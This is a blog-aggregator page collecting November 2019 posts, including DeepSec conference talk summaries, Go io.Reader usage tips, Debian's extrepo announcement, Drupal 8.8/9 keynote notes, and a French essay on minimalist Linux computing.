The next two talks focused more on penetration testing. “What’s Wrong with WebSocket APIs? Unveiling Vulnerabilities in WebSocket APIs” by Mikhail Egorov: he has already published a lot of research around WebSockets and started with a review of the protocol, then described different types of attacks. The second one was “Abusing Google Play Billing for Fun and Unlimited Credits!” by Guillaume Lopes. Guillaume explained how Google provides a payment framework for developers. Like the previous talk, it started with a review of the framework, then how it was abused. He tested 50 apps and 29 were vulnerable to this attack. All developers were contacted and only 1 replied!

To close the day, Robert Sell presented “Techniques and Tools for Becoming an Intelligence Operator“. Open-source intelligence can be used in many fields: forensics, research, etc. Robert defines it as “information that is hard to find but freely available”.

He explained how to prepare yourself to perform investigations, which tools to use, network connections, the creation of profiles on social networks and much more. The list of tools and URLs provided by Robert was amazing! Don’t forget that good OpSec is important: if you’re excited to search for information about your target, (s)he probably won’t be as excited as you! Also, keep in mind that all the techniques you use can also be used against you!

That’s all Folks! DeepSec is over! Thanks again to the organizers for a great event!

[The post DeepSec 2019 Wrap-Up Day #2 has been first published on /dev/random]

November 28, 2019

Hello from Vienna, where I’m at the DeepSec conference. Initially, I was scheduled to give my OSSEC training, but it was canceled due to a lack of students. Anyway, the organizers offered me the chance to join (huge thanks to them!). So, here is a wrap-up of the first day!

After the short opening ceremony by René Pfeiffer, the DeepSec organizer, the day started with a keynote. The slot was assigned to Raphaël Vinot and Quinn Norton: “Computer security is simple, the world is not”. 

I was curious based on the title, and the idea was very interesting. Every day, as security practitioners, we deal with computers, but we also have to deal with the people who use the computers we are protecting! We have to take them into account. Based on different stories, Raphaël and Quinn gave their views on how to communicate with our users. First principle: listen to them! Let them explain in their own words, and shut up. Even if it’s technically incorrect, they could have interesting information for us. The second principle: if you don’t listen to your users, you don’t know how to do your job! The next principle is to learn how they work, because you must adapt to them. The closer you are to your users, the better you understand the risks they are facing. Also, don’t just say “Do this, then this, …” but explain what is behind the action and why they have to do it. Don’t get too technical if people don’t ask for details. Don’t scare your users! The classic example is the motivated user who has to finish his/her presentation for tomorrow morning. She/he must transfer files home, but how? If you block all the classic file transfer services, be sure that the worst one will be used. Instead, promote a tool that you trust and that is reliable! Very interesting keynote!

The first regular talk was presented by Abraham Aranguren: “Chinese Police & Cloudpets”. If you don’t know CloudPets, have a look at this video. What could go wrong? A lot! The security of this connected toy was so bad that major resellers like Walmart or Amazon decided to stop selling it. It’s a connected toy linked to mobile apps to exchange messages between parents and kids. Nice, isn’t it? But they made a lot of mistakes regarding the security of the product. Abraham reviewed them:

  • Bad Bluetooth implementation: no controls on pairing or pushing/fetching data from the toy
  • Unprotected MongoDB indexed by Shodan, attacked multiple times by ransomware
  • Unencrypted firmware
  • Can be used as a spy device
  • The domain used to interact with the toy is now for sale (mycloudpets.com)
  • No HTTPS support
  • All recordings available in an S3 bucket (800K customers!)

The next part of the talk was about mobile apps used by the Chinese police to track people, especially the Muslim population in Xinjiang: IJOP & BXAQ. IJOP means “Integrated Joint Operations Platform” and is an application used to collect private information about people and to perform big-data analysis. The idea is to collect unusual behaviors and report them to central services for further investigation. The app was analyzed and reverse-engineered, and what they found is scary. The collected data includes:

  • Recording of height & blood type
  • Anomaly detection
  • Political data
  • Religious data
  • Education level
  • Abnormal electricity use
  • Problematic tools -> to make explosives?
  • Whether the person stopped using their phone

The BXAQ app is a trojan that is installed even on tourists’ phones to collect “interesting” data about them:

  • It scans the device on which it is installed
  • Collected info: calendar, contacts, calls, SMS, IMEI, IMSI, hardware details
  • Scan files on SD card (hash comparison)
  • A zip file is created (without any password) and uploaded to a police server

After a welcome coffee break, I came back to the same track to attend “Mastering AWS pen testing and methodology” by Ankit Giri. The goal of this talk was to give a better idea of how to pentest an AWS environment.

The talk was full of tips & tricks and references to tools. The idea is to start by enumerating the AWS accounts used by the platform as well as the services. To achieve this, you can use aws-inventory. Then check for CloudWatch, CloudTrail or billing alerts, check the configuration of the services being used, and make notes of services interacting with each other. S3 buckets are, of course, juicy targets; another tool presented was S3Scanner. Then keep an eye on IAM: how accounts are managed, what the access rights, keys and roles are. In this case, PMapper can be useful. EC2 instances must be reviewed to find open ports, ingress/egress traffic, and their security groups! If you are interested in testing AWS environments, have a look at this arsenal. To complete the presentation, a demo of Prowler was performed by Ankit.
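
As a small illustration of the enumeration step, here is a minimal sketch using the AWS SDK for Go to list the S3 buckets visible to a set of credentials (my own example, not one of the tools demoed):

package main

import (
    "fmt"
    "log"

    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/s3"
)

func main() {
    // Credentials come from the environment or ~/.aws/credentials.
    sess := session.Must(session.NewSession())
    svc := s3.New(sess)

    out, err := svc.ListBuckets(&s3.ListBucketsInput{})
    if err != nil {
        log.Fatal(err)
    }
    for _, b := range out.Buckets {
        fmt.Println(*b.Name) // each bucket is a candidate for a closer look
    }
}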

Then Yuri Chemerkin presented “Still Secure. We Empower What We Harden Because We Can Conceal“. To be honest with you, I did not understand the goal of the presentation; the speaker was not very engaging and much of the content was in Russian… From discussions with other people who attended the talk, it was apparently related to the information leaked by many tools and how to use it in security testing…

The next one was much more interesting: “Android Malware Adventures: Analyzing Samples and Breaking into C&C”, presented by Kürşat Oğuzhan Akıncı & Mert Can Coşkuner. The talk covered the hunt for malware in the mobile-app ecosystem, mainly Android (>70% of new malware targets Android phones). Even if Google implements checks for all apps submitted to the Play Store, the solution is not bullet-proof and, like on Windows systems, malware developers have techniques to bypass sandbox detection… They explained how they spotted a campaign targeting Turkey. They analyzed the malware and successfully exploited the C2 server, which was vulnerable to:

  • Directory listing
  • Lack of encryption keys
  • Password found in source code
  • Weak upload feature (they uploaded a webshell)
  • SQLi
  • Stored XSS

In the end, they uncovered the campaign, they hacked back (with proper authorization!), they restored stolen data and prevented further incidents. Eight threat actors were arrested.

My next choice was again a presentation about the analysis of a known campaign: “The Turtle Gone Ninja – Investigation of an Unusual Crypto-Mining Campaign”, presented by Ophir Harpaz and Daniel Goldberg.


The campaign was “Nansh0u” and it’s not a classic one. Ophir & Daniel gave many technical details about the malware and how it infected thousands of MSSQL servers to deploy a cryptominer. Why servers? Because they require less interaction, have better uptime, have lots of resources and are maintained by poor IT teams ;-). The infection path was: scan for MSSQL servers, brute-force them, enable code execution (via xp_cmdshell), drop files and execute them.


Then, Tim Berghoff and Hauke Gierow presented “The Daily Malware Grind – Looking Beyond the Cybers“. They performed a review of the threat landscape: ransomware, cryptominers, RATs, etc. Interesting fact: old malware remains active.


Lior Yaari talked about a hot topic these days: “The Future Is Here – Modern Attack Surface On Automotive“. Did you know that IDSs are coming to connected cars today? It’s a fact: cars are ultra-connected today and it will only increase in the future. If, in 2005, cars had an AUX connector and USB ports, today they have GPS, 4G, Bluetooth, WiFi and a lot of telemetry data sent to the manufacturer! By 2025, cars will be part of clouds, connected to PLCs, talking to electric chargers, gas stations, etc. Instead of using OBD2 connections, we will use regular apps to interact with them. Lior gave multiple examples of potential issues that people will face with their connected cars. A great topic!


To close the first day, I attended “Practical Security Awareness – Lessons Learnt and Best Practices” by Stefan Schumacher. He explained in detail why awareness training is not always successful.

It’s over for today! Stay tuned for the next wrap-up tomorrow! I’m expecting a lot from some presentations!

[The post DeepSec 2019 Wrap-Up Day #1 has been first published on /dev/random]

November 27, 2019

There’s an annoying little bug in VirtualBox that can cause your network config in the VM to become invalid after a reboot of your host Mac.
I’ve got a Mac Mini at home to act as a server & desktop. On it there are several VirtualBox VMs, among which a pihole to block unwanted requests via DNS.

November 25, 2019

I’ve really come to appreciate the elegance in the io abstractions in Go. The seemingly simple patterns of io.Reader and io.Writer open up a world of easily composable data pipelines.

Need to add compression? Just wrap the Writer with a gzip.Writer, etc.
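
For instance, a minimal sketch of the compression case, writing through a gzip.Writer into an in-memory buffer (the sample data is obviously made up):

package main

import (
    "bytes"
    "compress/gzip"
    "fmt"
    "io"
    "strings"
)

func main() {
    var buf bytes.Buffer
    zw := gzip.NewWriter(&buf) // anything written to zw lands compressed in buf
    if _, err := io.Copy(zw, strings.NewReader("hello, world")); err != nil {
        panic(err)
    }
    zw.Close() // flushes the remaining compressed data
    fmt.Println(buf.Len(), "compressed bytes")
}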

But there are some subtleties to be aware of that might bite you.

Let’s have a look at the description of io.Reader.Read():

Read(p []byte) (n int, err error)

Read reads up to len(p) bytes into p. It returns the number of bytes read (0 <= n <= len(p)) and any error encountered. Even if Read returns n < len(p), it may use all of p as scratch space during the call. If some data is available but not len(p) bytes, Read conventionally returns what is available instead of waiting for more.

This is fairly straightforward. You call Read() with a byte slice, which it may fill up. The key point here being may. Most IO sources (e.g. a file) will generally read the full buffer, until you reach the end of the file.

But not all of them. For instance, a gzip.Reader tends to do incomplete reads, requiring multiple Read() calls.

Recommendation: If you need to read a buffer in full, use io.ReadFull() instead of Read().
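
A minimal example of the difference, reading from a stream that is shorter than the buffer:

package main

import (
    "fmt"
    "io"
    "strings"
)

func main() {
    r := strings.NewReader("short stream")
    buf := make([]byte, 32)
    // io.ReadFull keeps calling Read until buf is full; a short stream
    // yields io.ErrUnexpectedEOF instead of a silent partial read.
    n, err := io.ReadFull(r, buf)
    fmt.Println(n, err) // 12 unexpected EOF
}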

When Read encounters an error or end-of-file condition after successfully reading n > 0 bytes, it returns the number of bytes read. It may return the (non-nil) error from the same call or return the error (and n == 0) from a subsequent call. An instance of this general case is that a Reader returning a non-zero number of bytes at the end of the input stream may return either err == EOF or err == nil. The next Read should return 0, EOF.

Callers should always process the n > 0 bytes returned before considering the error err. Doing so correctly handles I/O errors that happen after reading some bytes and also both of the allowed EOF behaviors.

This means it’s perfectly legal to return both n (and thus read a number of bytes) and an error at the same time.

It also means that the standard pattern of immediately checking for an error is wrong:

// Don't do this
n, err := in.Read(buf)
if err != nil {
    // Handle err
}
// Do something with n and buf

Always process n / buf first, then check for the presence of an error.
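
The correct counterpart of the snippet above looks like this (same hypothetical in and buf):

// Do this instead
n, err := in.Read(buf)
if n > 0 {
    // Process buf[:n] first, even when err != nil
}
if err != nil {
    // Handle err (which may be io.EOF)
}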

Implementations of Read are discouraged from returning a zero byte count with a nil error, except when len(p) == 0. Callers should treat a return of 0 and nil as indicating that nothing happened; in particular it does not indicate EOF.

The important take-away here: always check for err == io.EOF, some implementations might give you an empty read even if there is still data to come.
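
Putting it all together, a read loop that handles both allowed EOF behaviors as well as the empty read might look like this (a sketch: process is your own function, and this runs inside a function that can return an error):

for {
    n, err := r.Read(buf)
    if n > 0 {
        process(buf[:n]) // always consume the data first
    }
    if err == io.EOF {
        break // done, the stream is exhausted
    }
    if err != nil {
        return err
    }
    // n == 0 && err == nil: nothing happened, just try again
}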


Running into either of these corner cases is generally rare, since most IO sources are quite well-behaved. But being aware of the corner cases will save you a massive amount of debugging once you do run into them.



I published the following diary on isc.sans.edu: “My Little DoH Setup“:

“DoH”, this 3-letter acronym, is a buzzword on the Internet in 2019! It has been implemented in Firefox, and Microsoft announced that Windows will support it soon. There are pros & cons to encrypting DNS requests in HTTPS, but it’s not the goal of this diary to restart the debate. A previous diary explained how to prevent DoH from being used by Firefox but, this time, I’ll play on the other side and explain how to implement it in a way that keeps control of your DNS traffic (read: how to keep an eye on DNS requests performed by users and systems)… [Read more]

[The post [SANS ISC] My Little DoH Setup has been first published on /dev/random]

I’ve been using the Caddy webserver for all my projects lately. Here’s my current default config for a Laravel project.

November 22, 2019

I published the following diary on isc.sans.edu: “Abusing Web Filters Misconfiguration for Reconnaissance“:

Yesterday, an interesting incident was detected while working at a customer SOC. They use a “next-generation” firewall that implements a web filter based on categories. This is common in many organizations today: users’ web traffic is allowed/denied based on a URL categorization database (like “adult content”, “hacking”, “gambling”, …). How was it detected? [Read more]

[The post [SANS ISC] Abusing Web Filters Misconfiguration for Reconnaissance has been first published on /dev/random]

November 21, 2019

If you have a Laravel project, you might be surprised to find your routes are probably available on a number of different URLs.
I ran into this error when I tried any git operation (like git clone and git pull) on a Mac.

November 20, 2019

It’s beginning to look a lot like Christmas, ladies & gentlemen, and I’m planning on putting Autoptimize 2.6 nicely wrapped up under your Christmas tree.

The new version comes with the following changes:

  • New: Autoptimize can be configured at network level or at individual site-level when on multisite.
  • Extra: new option to specify what resources need to be preloaded.
  • Extra: add `display=swap` to Autoptimized (CSS-based) Google Fonts.
  • Images: support for lazyloading of background-images when set in the inline style attribute of a div.
  • Images: updated to lazysizes 5.1.2 (5.2 is in beta now, might be integrated in AO26 if released in time).
  • CSS/JS: no longer add type attributes to Autoptimized resources.
  • Improvement: cache clearing now also integrates with Kinsta, WP-Optimize & Nginx helper.
  • Added “Critical CSS” tab to highlight the criticalcss.com integration, which will be fully included in Autoptimize 2.7.
  • Large batch of misc. smaller improvements & fixes, more info in the [GitHub commit log](https://github.com/futtta/autoptimize/commits/beta).

So in order to make this the smoothest release possible I would like the beta to be downloaded and tested by as many people as possible, including you!

Any issue/question/bug can be reported here as a reply or, if it’s a bug and you’re more technically inclined, over at GitHub as an issue. Looking forward to your feedback!

We had an interesting security report for our Oh Dear monitoring service. An attacker could load a specific URL and trigger a 404 page in which they controlled the output.

November 19, 2019

My announcement the other day has resulted in a small amount of feedback already (through various channels), and a few extra repositories to be added. There was, however, enough feedback (and the manner of it unstructured enough) that I think it's time for a bit of a follow-up:

  • If you have any ideas about future directions this should take, then thank you! Please file them as issues against the extrepo-data repository, using the wishlist tag (if appropriate).
  • If you have a repository that you'd like to see added, awesome! Ideally you would just file a merge request; Vincent Bernat already did so, and I merged it this morning. If you can't figure out how to do so, then please file a bug with the information needed for the repository (deb URI, gpg key signing the repository, description of what type of software the repository contains, supported suites and components), and preferably also pointing to the gap in the documentation that makes it hard for you to understand, so I can improve ;-)
  • One questioner asked why we don't put third-party repository metadata into .deb packages, and ship them that way. The reason for this is that the Debian archive doesn't change after release, which is the point where most external repositories would be updated for the new release. As such, while it might be useful to have something like that in certain cases (e.g., the (now-defunct) pkg-mozilla-archive-keyring package follows this scheme), it can't work in all cases. In contrast, extrepo is designed to be updateable after the release of a particular Debian suite.
I’ve been moving some projects around lately and found myself in need of a weird thing I hadn’t considered before: specifying a specific SSH private key for running things like git clone or git pull.
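
For the impatient: one common way to do this, sketched here with placeholder key paths (whether the full post uses this exact approach is an assumption), is git's GIT_SSH_COMMAND environment variable, or the equivalent core.sshCommand setting:

GIT_SSH_COMMAND="ssh -i ~/.ssh/id_ed25519_work -o IdentitiesOnly=yes" git clone git@example.com:user/repo.git
git config core.sshCommand "ssh -i ~/.ssh/id_ed25519_work -o IdentitiesOnly=yes"

Both knobs exist in any recent git; IdentitiesOnly=yes stops ssh from offering your other keys first.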

November 18, 2019

It took a little longer than expected, but we are happy to announce the list of accepted stands for FOSDEM 2020. New this year is that some stands will switch between Saturday and Sunday, so we can give more projects the opportunity to present themselves to the community. There will be stands in the K, H and AW buildings, but who will be where will be announced closer to the event. We hope to see you all in February! Entire Conference Stand: CentOS, Debian, Gentoo Linux, FreeBSD, Fedora Project, openSUSE, openMandriva, illumos, Automotive Grade Linux, Coreboot + Flashrom…

November 17, 2019

All Drupal core initiatives with leads attending DrupalCon Amsterdam took part in an experimental PechaKucha-style keynote format (up to 15 slides each, 20 seconds per slide):

Drupal 8’s continuous innovation cycle resulted in amazing improvements that made today’s Drupal stand out far above Drupal 8.0.0 as originally released. Drupal core initiatives played a huge role in making that transformation happen. In this keynote, various initiative leads will take turns to highlight new capabilities, challenges they faced on the way and other stories from core development.

I represented the API-First Initiative and chose to keep it as short and powerful as possible by only using four of my five allowed minutes. I focused on the human side, with cross-company collaboration across timezones to get JSON:API into Drupal 8.7 core, how we invited community feedback to make it even better in the upcoming Drupal 8.8 release, and how the ecosystem around JSON:API is growing quickly!

It was a very interesting experience to have ten people together on stage, with nearly zero room for improvisation. I think it worked pretty well — it definitely forces a much more focused delivery! Huge thanks to Gábor Hojtsy, who was not on stage but did all the behind-the-scenes coordination.

Extra information: 
DrupalCon Amsterdam
Amsterdam, Netherlands

Debian ships with a lot of packages. This allows our users to easily install software without too much effort -- just run apt-get install foo, and foo gets installed.

However, Debian does not ship with everything, and for that reason there sometimes are things that are not installable with just the Debian repositories. Examples include:

  • Software that is not (yet) packaged for Debian
  • A repository for software that is in Debian, but for the bleeding-edge version of that software (e.g., maintained by upstream, or maintained by the Debian packager for that software)
  • Software that is not DFSG-free, and cannot be included into Debian's non-free repository due to licensing issues, but that can freely be installed by Debian users.

In order to enable and use such repositories on a Debian system, a user currently has to perform some actions that may be insecure:

  • Some repositories provide a link to a repository and a key, and expect the user to perform all actions to enable that repository manually. This works, but mistakes are easy to make (especially for beginners), and therefore it is not ideal.
  • Some repositories provide a script to enable the repository, which must be run as root. Such scripts are not signed when run. In other words, we expect users to run untrusted code downloaded from the Internet, when everywhere else we tell people that doing so is a bad idea.
  • Some repositories provide a single .deb file that can be installed, and which enables the necessary repositories in the apt configuration. Since, in contrast to RPM files, Debian packages are not signed, this means that the configuration is not enabled securely.

While there is a tool to enable package signatures in Debian packages, the dpkg tool does not enforce the existence of such signatures, and therefore it is possible for an attacker to replace the (signed) .deb file with an unsigned variant, bypassing the whole signature.

In an effort to remedy this whole situation, I looked at creating extrepo, a package that would download repository metadata from a special-purpose repository, verify the signatures placed on that metadata, and if everything matches, enable the repository by creating the necessary apt configuration files.

This should allow users to enable external repository "foo" by running extrepo enable foo, rather than downloading a script from foo's website and executing it as root -- or other similarly insecure options.
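
As a sketch of the intended workflow (the enable subcommand comes from the post itself; the search subcommand and the "winehq" repository name are illustrative assumptions):

apt-get install extrepo
extrepo search wine     # look up matching repository definitions
extrepo enable winehq   # verify the metadata signature, then write the apt configuration
apt-get update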

The extrepo package has been uploaded to Debian; once NEW processing has finished, it will be available in Debian unstable.

I might upload it to backports too if no issues are found, but that won't be an immediate thing.

November 15, 2019

I want to show you how I use a tool called goaccess to do some quick analysis of access logs on webservers.
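
A hedged sketch of what that looks like (the log path and format are assumptions; goaccess supports several common formats):

goaccess /var/log/nginx/access.log --log-format=COMBINED                  # interactive terminal dashboard
goaccess /var/log/nginx/access.log --log-format=COMBINED -o report.html   # static HTML report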

November 12, 2019

I just finished the last bits of migration for this site. It involved moving my podcasts from the podcast.

November 09, 2019

Here’s a quick tip on how to combine multiple separate videos into a single one, using ffmpeg.
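
One common way to do it is ffmpeg's concat demuxer; a minimal sketch with placeholder file names (the inputs must share the same codecs for -c copy to work, and whether the post uses this exact method is an assumption):

printf "file '%s'\n" part1.mp4 part2.mp4 part3.mp4 > list.txt
ffmpeg -f concat -safe 0 -i list.txt -c copy combined.mp4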

November 08, 2019

I published the following diary on isc.sans.edu: “Microsoft Apps Diverted from Their Main Use“:

This week, the CERT.eu organized its yearly conference in Brussels. Among many interesting presentations, one of them covered what they called the “cat’n’mouse” game that Blue and Red teams are playing continuously. When the Blue team has detected an attack technique, they write a rule or implement a new control to detect or block it. Then, the Red team has to find an alternative attack path, and so on… A classic example is the detection of malicious activity via parent/child process relations. It’s quite common to implement the following simple rule (in Sigma format)… [Read more]

[The post [SANS ISC] Microsoft Apps Diverted from Their Main Use has been first published on /dev/random]

If you run a Laravel application purely as a headless API, you can benefit from disabling the HTTP sessions.

November 07, 2019

Macron. Don’t talk. Act.

Where France could start is by instructing its military leadership to go talk with the German army. You could also take a look at how the Belgian and Dutch armies already share a number of tasks between them.

What will be needed in any case is an extreme form of funding. That will presumably not be possible with contributions from the member states. So just let the ECB print the money. That might immediately set euro inflation in motion. That’s what all EU economists want anyway. Isn’t it?

In twenty years the EU will be the most innovative region in the world, with cutting-edge technology driven by massive EU defense spending. A bit like what DARPA does for the US. Nothing wrong with that.

Do.

ps. You can start by running this through the German DeepL if you want a French translation.

November 06, 2019

It took a bit longer than I expected but I’m happy to say I’ve migrated this website from WordPress to Hugo and introduced a new layout.

November 05, 2019

Last week, many Drupalists came together for Drupalcon Amsterdam.

As a matter of tradition, I presented my State of Drupal keynote. You can watch a recording of my keynote (starting at 20:44 minutes), or download a copy of my slides (149 MB).

Drupal 8 innovation update

I kicked off my keynote with an update on Drupal 8. Drupal 8.8 is expected to ship on December 4th, and will come with many exciting improvements.

Drupal 8.7 shipped with a Media Library to allow editors to reuse images, videos and other media assets. In Drupal 8.8, Media Library has been marked as stable, and features a way to easily embed media assets using a WYSIWYG text editor.

I'm even more proud to say that Drupal has never looked better, nor been more accessible. I showed our progress on Claro, a new administration UI for Drupal. Once Claro is stable, Drupal will look more modern and appealing out-of-the-box.

The Composer Initiative has also made significant progress. Drupal 8.8 will be the first Drupal release with proper, official support for Composer out-of-the-box. Composer helps solve the problem of Drupal being difficult to install and update. With Composer, developers can update Drupal in one step, as Composer will take care of updating all the dependencies (e.g. third party code).
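
In practice, that one step looks something like the following sketch (the exact package name depends on whether the site uses the drupal/core-recommended project template, so treat it as an assumption):

composer update drupal/core-recommended --with-dependencies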

What is better than one-step updates? Zero-step updates. We also showed progress on the Automated Updates Initiative.

Finally, Drupal 8.8 marks significant progress with our API-first Initiative, with several new improvements to JSON:API support in the contributed space, including an interactive query builder called JSON:API Explorer. This work solidifies Drupal's leadership position as a leading headless or decoupled solution.

Drupal 9 will be the easiest major update

A couple stares off into the distant sunrise, which has a '9' imposed on the rising sun.

Next, I gave an update on Drupal 9, as we're just eight months from the target release date. We have been working hard to make Drupal 9 the easiest major update in the last decade. In my keynote at 42:25, I showed how to upgrade your site to Drupal 9.0.0's development release.

Drupal 9 product strategy

I am proud of all the progress we made on Drupal 8. Nevertheless, it's also time to start thinking about our strategic priorities for Drupal 9. With that in mind, I proposed four strategic tracks for Drupal 9 (and three initial initiatives):

A mountain with a Drupal 9 flag at the top. Four strategic product tracks lead to the summit.

Strategic track 1: reduce cost and effort

Users want site development to be low-cost and zero-maintenance. As a result, we'll need to continue to focus on initiatives such as automated updates, configuration management, and more.

Strategic track 2: prioritizing the beginner experience

As we saw in a survey Acquia's UX team conducted, most people have a relatively poor initial impression of Drupal, though if they stick with Drupal long enough, their impression grows significantly over time. This is unlike any of its competitors, whose impression decreases as experience is gained. Drupal 9 should focus on attracting new users, and decreasing beginners' barriers to entry so they can fall in love with Drupal much sooner.

A graph that shows how Drupal is perceived by beginners, intermediate users and expert users. Beginners struggle with Drupal while experts love Drupal.
A graph that shows how Drupal, WordPress, AEM and Sitecore are perceived by beginners, intermediate users and experts. Drupal's sentiment curve goes in the opposite direction of WordPress', AEM's and Sitecore's. This presents both a big challenge and opportunity for Drupal.

We also officially launched the first initiative on this track; a new front-end theme for Drupal called "Olivero". This new default theme will give new users a much better first impression of Drupal, as well as reflect the modern backend that Drupal sports under the hood.

Strategic track 3: drive the Open Web

As you may know, 1 out of 40 websites run on Drupal. With that comes a responsibility to help drive the future of the Open Web. By 2022-2025, 4 billion new people will join the internet. We want all people to have access to the Open Web, and as a result should focus on accessibility, inclusiveness, security, privacy, and interoperability.

A person dressed in a space suit is headed towards a colorful vortex with a glowing Druplicon at the center.

Strategic track 4: be the best structured data engine

A slide that makes the point that Drupal needs to manage more diverse content and integrate with more different platforms.

We've already seen the beginnings of a content explosion, and will experience 300 billion new devices coming online by 2030. By continuing to make Drupal a better and better content repository with a flexible API, we'll be ready for a future with more content, more integrations, more devices, and more channels.

An overview of the four proposed Drupal 9 strategic product tracks

Over the next six months, we'll be opening up these proposed tracks to the community for discussion, and introducing surveys to define the 10 inaugural initiatives for Drupal 9. So far the feedback at DrupalCon Amsterdam has been very positive, but I'm looking forward to much more feedback!

Growing sponsored contributions

In a previous blog post, Balancing Makers and Takers to scale and sustain Open Source, I covered a number of topics related to organizational contribution. Around 1:19:44, my keynote goes into more details, including interviews with several prominent business owners and corporate contributors in the Drupal community.

You can find the different interview snippets below:

  • Baddy Sonja Breidert, co-founder of 1xINTERNET, on why it is important to help convert Takers into Makers.
  • Tiffany Farriss, CEO of Palantir, on what it would take for her organization to contribute substantially more to Drupal.
  • Mike Lamb, Vice President of Global Digital Platforms at Pfizer, announcing that we are establishing the Contribution Recognition Committee to govern and improve Drupal's contribution credit system.

Thank you

Thank you to everyone who attended Drupalcon Amsterdam and contributed to the event's success. I'm always amazed by the vibrant community that makes Drupal so unique. I'm proud to showcase the impressive work of contributors in my presentations, and congratulate all of the hardworking people that are crucial to building Drupal 8 and 9 behind the scenes. I'm excited to continue to celebrate our work and friendships at future events.

A word cloud of all the individuals who contributed to Drupal 8.8. Thanks to the 641 individuals who worked on Drupal 8.8 so far.
A word cloud of all the organizational contributors who contributed to Drupal 8.8. Thanks to the 243 different organizations who contributed to Drupal 8.8 to date.
I’ve just finished migrating this website from WordPress to a statically generated site with Hugo.

November 04, 2019

A short chronicle of a return to the roots and to the essentials by a free-software lover at heart.

Digital intoxication is not just about daily Facebook consumption. The tools we use to be “productive” also take an enormous toll on our mental energy. As Cal Newport points out in his books Deep Work and Digital Minimalism, we tend to consider only the potential benefit of a tool, regardless of its costs. This inevitably leads us to the absurd conclusion that “having the tool is better than not having it at all”.

In my mind, this excess of digital consumption crystallized in Apple's App Store. With its pretty pictures and pretty colors, the App Store's goal was to get me to install yet another application that would make me more productive; yet another application, admittedly very pretty, into which I would have to migrate my existing data and then learn to use, before starting over with another one a few months later.

Also fed up with the lack of configurability, as well as the bugs of MacOS, I decided to regain my freedom and return to my first love. Five years of Mac were a nice experience, but playtime is over; I now want to get back to serious business.

Rather than attempting an app-for-app migration, finding an equivalent application for each of my uses, I took the opportunity to declutter, listing all the apps and services I used in order to reduce them to a minimum.

The philosophy

If I invest in a new laptop, the main question to ask is: “to do what?”. You can do everything with a computer nowadays. But what is my main goal, besides running Linux?

In my case, it's very simple: writing. Whether for my personal or professional projects, I now bring everything back to writing (by the way, if you're looking for a writer/screenwriter/popularizer/futurologist, I also work for hire).

Besides the unavoidable email and a web browser, anything not directly related to writing must be considered superfluous. I allowed myself a single pleasure: reading RSS feeds.

For the rest, I forbid myself any distraction on this new computer. Social networks and news media will even be blocked. The idea is for my brain to understand instinctively that this laptop can only do one thing: serve as a typewriter. Rather than constantly fighting the temptation to distract myself, I make distraction impossible on one specific machine.
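
(One blunt way to enforce that kind of blocking, as a minimal sketch with placeholder domains; the actual method used is not stated in the text:)

# appended to /etc/hosts
0.0.0.0 facebook.com www.facebook.com
0.0.0.0 twitter.com www.twitter.com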

This also settles quite a few questions about compatibility with this or that vaguely dispensable piece of software. If it is not indispensable to make me write (and, deep down, nothing is indispensable to write in a Markdown file), then the question doesn't even arise: it has no place on my machine.

The laptop

While I missed Linux terribly and won't regret MacOS for a single second, I can't say the same about the thinness, lightness and screen quality of a MacBook. 900 grams, with no fan and not the slightest noise: hard to do better.

My choice finally landed on the Star Lite from Star Labs. At 1.1 kg it's a bit heavy, a bit thicker, with a mediocre screen. But, as a non-negligible advantage, it costs literally a quarter of the price of a MacBook. At that price, I don't expect a miracle.

I am surprised, however, by the overall build. No plastic, but that kind of aluminium that feels very solid. So solid that opening the laptop requires a real two-handed effort every time. Once open, the screen is clearly worse, ultra-sensitive to reflections, and it wobbles slightly when I type. The keyboard, though, is the excellent surprise after years on a MacBook: what a comfort to have real keys! I only regret that the keys on the right are quite small because, in Bépo, the rightmost key is the W; I very regularly type a line break instead of a W. But I won't complain: the MacBook had become literally unusable because of an apparently very widespread bug that moves the cursor randomly while typing.

Performance-wise, I don't know whether it's the hardware or Linux, but everything is perfectly responsive in i3. The MacBook very often burned a lot of CPU, websites were slow to open and Antidote was literally unusable. None of that on the Star Lite: I'm back to a fluid, normal web experience and I've made my peace with Antidote. Under GNOME Shell, it's another story, especially with the trackpad. Because the trackpad is a real disaster: from time to time, and I suspect it's related to CPU load, it locks up, becomes erratic or gets very slow.

But I've decided to live with it, because I want to use the keyboard more and more. The Star Lite even has a magic key to completely disable the touchpad. I love it!

In short, the Star Lite is far from perfect, but it's small, portable, relatively light, sturdy, powerful enough for my minimal usage, and cheap. Despite having no fans, it is nevertheless noisy: the RAM clicks like in an old desktop from the 90s. I thought that didn't exist anymore… That, and the infernal white LED that blinds me permanently to tell me my laptop is switched on!

My workflow

One conclusion quickly became obvious to me: I had to minimize the different places where my data is stored. More than once I found myself looking for a file in Evernote when it was in my Dropbox or in Notion, no longer knowing exactly what I had installed on my machine, or knowing that I had interacted with a partner on a project without knowing whether it was on Slack, Evernote, Google Drive or by email.

In recent years, I tried to get rid of files, to keep everything in Evernote or whichever competing service I was testing. But today I realize that emails and files are two unavoidable pillars. They will always exist and I will always have to work with them. So why add other pillars?

It's very simple: from now on I will only use traditional files, organized my own way. No more stacks, notebooks, notes. If a piece of software doesn't let me manage my data as files, in an open format and in a structure I control, I won't even consider using it (so exit Joplin and Notable, which are quite good but force a directory structure on you).

Starting from the premise that each project is a directory, after some trial and error I ended up with the following structure of 5 very simple directories.

Archives: as the name suggests, Archives contains all finished or abandoned projects. Note that, rather than sorting by “type”, I treat everything as a project. The photos of my wedding, for example, are in a “Mariage” folder which also contains the PDF of the invitations, the spreadsheet with the guest list and all the other archives. It's simple, but I had to break the habit of putting photos in “Photos”, PDFs in “Documents”, and so on.

inbox: an essentially empty directory containing temporary or in-transit files. A train ticket, a PDF to print, a downloaded document I haven't filed yet, etc.

Workbox: contains ongoing projects that don't require sustained attention; more like permanent background projects. For example, the SPRL folder containing everything related to our company is in Workbox. An Aida4 folder contains everything related to the freediving certification I'm currently working on. My migration to Linux and my laptop search were also in this directory.

Frigobox: a special directory that contains all the projects I want to invest myself in, but that I forbid myself to work on for now, to avoid spreading myself thin. Proofreading Printeurs to turn it into a proper ebook is, for example, in Frigobox. Several blog posts are in there too.

Focusbox: the projects I want to focus on. When I'm at my computer, this is the directory I should be in and working from. Ideally one, and no more than 3, projects in this directory.

These 5 folders are synchronized with Tresorit. I also have 3 other folders that are not on Tresorit: Download, a directory for everything temporary that can be lost; devel, a directory containing the git repositories I work on; and Dropbox, to keep access to certain applications that require Dropbox (in my case, synchronization with the Freewrite).

